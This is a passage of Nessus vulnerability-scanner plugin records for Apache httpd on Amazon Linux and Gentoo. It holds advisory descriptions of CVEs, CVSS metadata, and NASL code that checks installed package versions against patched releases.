'rpm_spec_vers_cmp':TRUE},\n {'reference':'mod24_ldap-2.4.51-1.94.amzn1', 'cpu':'x86_64', 'release':'ALA', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'mod24_md-2.4.51-1.94.amzn1', 'cpu':'i686', 'release':'ALA', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'mod24_md-2.4.51-1.94.amzn1', 'cpu':'x86_64', 'release':'ALA', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'mod24_proxy_html-2.4.51-1.94.amzn1', 'cpu':'i686', 'release':'ALA', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'mod24_proxy_html-2.4.51-1.94.amzn1', 'cpu':'x86_64', 'release':'ALA', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'mod24_session-2.4.51-1.94.amzn1', 'cpu':'i686', 'release':'ALA', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'mod24_session-2.4.51-1.94.amzn1', 'cpu':'x86_64', 'release':'ALA', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'mod24_ssl-2.4.51-1.94.amzn1', 'cpu':'i686', 'release':'ALA', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'mod24_ssl-2.4.51-1.94.amzn1', 'cpu':'x86_64', 'release':'ALA', 'rpm_spec_vers_cmp':TRUE}\n];\n\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var reference = NULL;\n var release = NULL;\n var cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var allowmaj = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (reference && release) {\n if (rpm_check(release:release, cpu:cpu, reference:reference, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd24 / httpd24-debuginfo / httpd24-devel / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:57:10", "description": "The version of httpd installed on the remote host is prior to 2.4.51-1. It is, therefore, affected by multiple vulnerabilities as referenced in the ALAS2-2021-1716 advisory.\n\n - A crafted method sent through HTTP/2 will bypass validation and be forwarded by mod_proxy, which can lead to request splitting or cache poisoning. This issue affects Apache HTTP Server 2.4.17 to 2.4.48.\n (CVE-2021-33193)\n\n - Malformed requests may cause the server to dereference a NULL pointer. This issue affects Apache HTTP Server 2.4.48 and earlier. (CVE-2021-34798)\n\n - A carefully crafted request uri-path can cause mod_proxy_uwsgi to read above the allocated memory and crash (DoS). This issue affects Apache HTTP Server versions 2.4.30 to 2.4.48 (inclusive). (CVE-2021-36160)\n\n - ap_escape_quotes() may write beyond the end of a buffer when given malicious input. No included modules pass untrusted data to these functions, but third-party / external modules may. This issue affects Apache HTTP Server 2.4.48 and earlier. (CVE-2021-39275)\n\n - A crafted request uri-path can cause mod_proxy to forward the request to an origin server choosen by the remote user. This issue affects Apache HTTP Server 2.4.48 and earlier. (CVE-2021-40438)\n\n - While fuzzing the 2.4.49 httpd, a new null pointer dereference was detected during HTTP/2 request processing, allowing an external source to DoS the server. This requires a specially crafted request. The vulnerability was recently introduced in version 2.4.49. No exploit is known to the project.\n (CVE-2021-41524)\n\n - A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration require all denied, these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. The fix in Apache HTTP Server 2.4.50 was found to be incomplete, see CVE-2021-42013. (CVE-2021-41773)\n\n - It was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration require all denied, these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution. This issue only affects Apache 2.4.49 and Apache 2.4.50 and not earlier versions. (CVE-2021-42013)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-16T00:00:00", "type": "nessus", "title": "Amazon Linux 2 : httpd (ALAS-2021-1716)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33193", "CVE-2021-34798", "CVE-2021-36160", "CVE-2021-39275", "CVE-2021-40438", "CVE-2021-41524", "CVE-2021-41773", "CVE-2021-42013"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:httpd", "p-cpe:/a:amazon:linux:httpd-debuginfo", "p-cpe:/a:amazon:linux:httpd-devel", "p-cpe:/a:amazon:linux:httpd-filesystem", "p-cpe:/a:amazon:linux:httpd-manual", "p-cpe:/a:amazon:linux:httpd-tools", "p-cpe:/a:amazon:linux:mod_ldap", "p-cpe:/a:amazon:linux:mod_md", "p-cpe:/a:amazon:linux:mod_proxy_html", "p-cpe:/a:amazon:linux:mod_session", "p-cpe:/a:amazon:linux:mod_ssl", "cpe:/o:amazon:linux:2"], "id": "AL2_ALAS-2021-1716.NASL", "href": "https://www.tenable.com/plugins/nessus/154179", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux 2 Security Advisory ALAS-2021-1716.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(154179);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2021-33193\",\n \"CVE-2021-34798\",\n \"CVE-2021-36160\",\n \"CVE-2021-39275\",\n \"CVE-2021-40438\",\n \"CVE-2021-41524\",\n \"CVE-2021-41773\",\n \"CVE-2021-42013\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0440-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0451-S\");\n script_xref(name:\"ALAS\", value:\"2021-1716\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/12/15\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0046\");\n\n script_name(english:\"Amazon Linux 2 : httpd (ALAS-2021-1716)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Amazon Linux 2 host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of httpd installed on the remote host is prior to 2.4.51-1. It is, therefore, affected by multiple\nvulnerabilities as referenced in the ALAS2-2021-1716 advisory.\n\n - A crafted method sent through HTTP/2 will bypass validation and be forwarded by mod_proxy, which can lead\n to request splitting or cache poisoning. This issue affects Apache HTTP Server 2.4.17 to 2.4.48.\n (CVE-2021-33193)\n\n - Malformed requests may cause the server to dereference a NULL pointer. This issue affects Apache HTTP\n Server 2.4.48 and earlier. (CVE-2021-34798)\n\n - A carefully crafted request uri-path can cause mod_proxy_uwsgi to read above the allocated memory and\n crash (DoS). This issue affects Apache HTTP Server versions 2.4.30 to 2.4.48 (inclusive). (CVE-2021-36160)\n\n - ap_escape_quotes() may write beyond the end of a buffer when given malicious input. No included modules\n pass untrusted data to these functions, but third-party / external modules may. This issue affects Apache\n HTTP Server 2.4.48 and earlier. (CVE-2021-39275)\n\n - A crafted request uri-path can cause mod_proxy to forward the request to an origin server choosen by the\n remote user. This issue affects Apache HTTP Server 2.4.48 and earlier. (CVE-2021-40438)\n\n - While fuzzing the 2.4.49 httpd, a new null pointer dereference was detected during HTTP/2 request\n processing, allowing an external source to DoS the server. This requires a specially crafted request. The\n vulnerability was recently introduced in version 2.4.49. No exploit is known to the project.\n (CVE-2021-41524)\n\n - A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could\n use a path traversal attack to map URLs to files outside the directories configured by Alias-like\n directives. If files outside of these directories are not protected by the usual default configuration\n require all denied, these requests can succeed. If CGI scripts are also enabled for these aliased\n pathes, this could allow for remote code execution. This issue is known to be exploited in the wild. This\n issue only affects Apache 2.4.49 and not earlier versions. The fix in Apache HTTP Server 2.4.50 was found\n to be incomplete, see CVE-2021-42013. (CVE-2021-41773)\n\n - It was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker\n could use a path traversal attack to map URLs to files outside the directories configured by Alias-like\n directives. If files outside of these directories are not protected by the usual default configuration\n require all denied, these requests can succeed. If CGI scripts are also enabled for these aliased\n pathes, this could allow for remote code execution. This issue only affects Apache 2.4.49 and Apache\n 2.4.50 and not earlier versions. (CVE-2021-42013)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/AL2/ALAS-2021-1716.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-33193\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-34798\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-36160\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-39275\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-40438\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-41524\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-41773\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-42013\");\n script_set_attribute(attribute:\"solution\", value:\n\"Run 'yum update httpd' to update your system.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-42013\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache 2.4.50 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache 2.4.49/2.4.50 Traversal RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/08/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/10/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/10/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd-filesystem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:mod_ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:mod_md\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:mod_proxy_html\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:mod_session\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux:2\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nvar release = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nvar os_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nvar os_ver = os_ver[1];\nif (os_ver != \"2\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux 2\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar pkgs = [\n {'reference':'httpd-2.4.51-1.amzn2', 'cpu':'aarch64', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'httpd-2.4.51-1.amzn2', 'cpu':'i686', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'httpd-2.4.51-1.amzn2', 'cpu':'x86_64', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'httpd-debuginfo-2.4.51-1.amzn2', 'cpu':'aarch64', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'httpd-debuginfo-2.4.51-1.amzn2', 'cpu':'i686', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'httpd-debuginfo-2.4.51-1.amzn2', 'cpu':'x86_64', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'httpd-devel-2.4.51-1.amzn2', 'cpu':'aarch64', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'httpd-devel-2.4.51-1.amzn2', 'cpu':'i686', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'httpd-devel-2.4.51-1.amzn2', 'cpu':'x86_64', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'httpd-filesystem-2.4.51-1.amzn2', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'httpd-manual-2.4.51-1.amzn2', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'httpd-tools-2.4.51-1.amzn2', 'cpu':'aarch64', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'httpd-tools-2.4.51-1.amzn2', 'cpu':'i686', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'httpd-tools-2.4.51-1.amzn2', 'cpu':'x86_64', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'mod_ldap-2.4.51-1.amzn2', 'cpu':'aarch64', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'mod_ldap-2.4.51-1.amzn2', 'cpu':'i686', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'mod_ldap-2.4.51-1.amzn2', 'cpu':'x86_64', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'mod_md-2.4.51-1.amzn2', 'cpu':'aarch64', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'mod_md-2.4.51-1.amzn2', 'cpu':'i686', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'mod_md-2.4.51-1.amzn2', 'cpu':'x86_64', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'mod_proxy_html-2.4.51-1.amzn2', 'cpu':'aarch64', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'mod_proxy_html-2.4.51-1.amzn2', 'cpu':'i686', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'mod_proxy_html-2.4.51-1.amzn2', 'cpu':'x86_64', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'mod_session-2.4.51-1.amzn2', 'cpu':'aarch64', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'mod_session-2.4.51-1.amzn2', 'cpu':'i686', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'mod_session-2.4.51-1.amzn2', 'cpu':'x86_64', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'mod_ssl-2.4.51-1.amzn2', 'cpu':'aarch64', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'mod_ssl-2.4.51-1.amzn2', 'cpu':'i686', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'mod_ssl-2.4.51-1.amzn2', 'cpu':'x86_64', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE}\n];\n\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var reference = NULL;\n var release = NULL;\n var cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var allowmaj = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (reference && release) {\n if (rpm_check(release:release, cpu:cpu, reference:reference, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-debuginfo / httpd-devel / etc\");\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-10T19:29:15", "description": "The remote host is affected by the vulnerability described in GLSA-202208-20 (Apache HTTPD: Multiple Vulnerabilities)\n\n - A crafted method sent through HTTP/2 will bypass validation and be forwarded by mod_proxy, which can lead to request splitting or cache poisoning. This issue affects Apache HTTP Server 2.4.17 to 2.4.48.\n (CVE-2021-33193)\n\n - Malformed requests may cause the server to dereference a NULL pointer. This issue affects Apache HTTP Server 2.4.48 and earlier. (CVE-2021-34798)\n\n - A carefully crafted request uri-path can cause mod_proxy_uwsgi to read above the allocated memory and crash (DoS). This issue affects Apache HTTP Server versions 2.4.30 to 2.4.48 (inclusive). (CVE-2021-36160)\n\n - ap_escape_quotes() may write beyond the end of a buffer when given malicious input. No included modules pass untrusted data to these functions, but third-party / external modules may. This issue affects Apache HTTP Server 2.4.48 and earlier. (CVE-2021-39275)\n\n - A crafted request uri-path can cause mod_proxy to forward the request to an origin server choosen by the remote user. This issue affects Apache HTTP Server 2.4.48 and earlier. (CVE-2021-40438)\n\n - While fuzzing the 2.4.49 httpd, a new null pointer dereference was detected during HTTP/2 request processing, allowing an external source to DoS the server. This requires a specially crafted request. The vulnerability was recently introduced in version 2.4.49. No exploit is known to the project.\n (CVE-2021-41524)\n\n - A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration require all denied, these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. The fix in Apache HTTP Server 2.4.50 was found to be incomplete, see CVE-2021-42013. (CVE-2021-41773)\n\n - It was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration require all denied, these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution. This issue only affects Apache 2.4.49 and Apache 2.4.50 and not earlier versions. (CVE-2021-42013)\n\n - A crafted URI sent to httpd configured as a forward proxy (ProxyRequests on) can cause a crash (NULL pointer dereference) or, for configurations mixing forward and reverse proxy declarations, can allow for requests to be directed to a declared Unix Domain Socket endpoint (Server Side Request Forgery). This issue affects Apache HTTP Server 2.4.7 up to 2.4.51 (included). (CVE-2021-44224)\n\n - A carefully crafted request body can cause a buffer overflow in the mod_lua multipart parser (r:parsebody() called from Lua scripts). The Apache httpd team is not aware of an exploit for the vulnerabilty though it might be possible to craft one. This issue affects Apache HTTP Server 2.4.51 and earlier. (CVE-2021-44790)\n\n - A carefully crafted request body can cause a read to a random memory area which could cause the process to crash. This issue affects Apache HTTP Server 2.4.52 and earlier. (CVE-2022-22719)\n\n - Apache HTTP Server 2.4.52 and earlier fails to close inbound connection when errors are encountered discarding the request body, exposing the server to HTTP Request Smuggling (CVE-2022-22720)\n\n - If LimitXMLRequestBody is set to allow request bodies larger than 350MB (defaults to 1M) on 32 bit systems an integer overflow happens which later causes out of bounds writes. This issue affects Apache HTTP Server 2.4.52 and earlier. (CVE-2022-22721)\n\n - Out-of-bounds Write vulnerability in mod_sed of Apache HTTP Server allows an attacker to overwrite heap memory with possibly attacker provided data. This issue affects Apache HTTP Server 2.4 version 2.4.52 and prior versions. (CVE-2022-23943)\n\n - Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling') vulnerability in mod_proxy_ajp of Apache HTTP Server allows an attacker to smuggle requests to the AJP server it forwards requests to. This issue affects Apache HTTP Server Apache HTTP Server 2.4 version 2.4.53 and prior versions.\n (CVE-2022-26377)\n\n - The ap_rwrite() function in Apache HTTP Server 2.4.53 and earlier may read unintended memory if an attacker can cause the server to reflect very large input using ap_rwrite() or ap_rputs(), such as with mod_luas r:puts() function. Modules compiled and distributed separately from Apache HTTP Server that use the 'ap_rputs' function and may pass it a very large (INT_MAX or larger) string must be compiled against current headers to resolve the issue. (CVE-2022-28614)\n\n - Apache HTTP Server 2.4.53 and earlier may crash or disclose information due to a read beyond bounds in ap_strcmp_match() when provided with an extremely large input buffer. While no code distributed with the server can be coerced into such a call, third-party modules or lua scripts that use ap_strcmp_match() may hypothetically be affected. (CVE-2022-28615)\n\n - In Apache HTTP Server 2.4.53 and earlier, a malicious request to a lua script that calls r:parsebody(0) may cause a denial of service due to no default limit on possible input size. (CVE-2022-29404)\n\n - If Apache HTTP Server 2.4.53 is configured to do transformations with mod_sed in contexts where the input to mod_sed may be very large, mod_sed may make excessively large memory allocations and trigger an abort.\n (CVE-2022-30522)\n\n - Apache HTTP Server 2.4.53 and earlier may return lengths to applications calling r:wsread() that point past the end of the storage allocated for the buffer. (CVE-2022-30556)\n\n - Apache HTTP Server 2.4.53 and earlier may not send the X-Forwarded-* headers to the origin server based on client side Connection header hop-by-hop mechanism. This may be used to bypass IP based authentication on the origin server/application. (CVE-2022-31813)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-15T00:00:00", "type": "nessus", "title": "GLSA-202208-20 : Apache HTTPD: Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33193", "CVE-2021-34798", "CVE-2021-36160", "CVE-2021-39275", "CVE-2021-40438", "CVE-2021-41524", "CVE-2021-41773", "CVE-2021-42013", "CVE-2021-44224", "CVE-2021-44790", "CVE-2022-22719", "CVE-2022-22720", "CVE-2022-22721", "CVE-2022-23943", "CVE-2022-26377", "CVE-2022-28614", "CVE-2022-28615", "CVE-2022-29404", "CVE-2022-30522", "CVE-2022-30556", "CVE-2022-31813"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:apache", "p-cpe:/a:gentoo:linux:apache-tools", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-202208-20.NASL", "href": "https://www.tenable.com/plugins/nessus/164114", "sourceData": "#\n# (C) Tenable, Inc.\n#\n# @NOAGENT@\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 202208-20.\n#\n# The advisory text is Copyright (C) 2001-2021 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike\n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(164114);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2021-33193\",\n \"CVE-2021-34798\",\n \"CVE-2021-36160\",\n \"CVE-2021-39275\",\n \"CVE-2021-40438\",\n \"CVE-2021-41524\",\n \"CVE-2021-41773\",\n \"CVE-2021-42013\",\n \"CVE-2021-44224\",\n \"CVE-2021-44790\",\n \"CVE-2022-22719\",\n \"CVE-2022-22720\",\n \"CVE-2022-22721\",\n \"CVE-2022-23943\",\n \"CVE-2022-26377\",\n \"CVE-2022-28614\",\n \"CVE-2022-28615\",\n \"CVE-2022-29404\",\n \"CVE-2022-30522\",\n \"CVE-2022-30556\",\n \"CVE-2022-31813\"\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/12/15\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0046\");\n\n script_name(english:\"GLSA-202208-20 : Apache HTTPD: Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is affected by the vulnerability described in GLSA-202208-20 (Apache HTTPD: Multiple Vulnerabilities)\n\n - A crafted method sent through HTTP/2 will bypass validation and be forwarded by mod_proxy, which can lead\n to request splitting or cache poisoning. This issue affects Apache HTTP Server 2.4.17 to 2.4.48.\n (CVE-2021-33193)\n\n - Malformed requests may cause the server to dereference a NULL pointer. This issue affects Apache HTTP\n Server 2.4.48 and earlier. (CVE-2021-34798)\n\n - A carefully crafted request uri-path can cause mod_proxy_uwsgi to read above the allocated memory and\n crash (DoS). This issue affects Apache HTTP Server versions 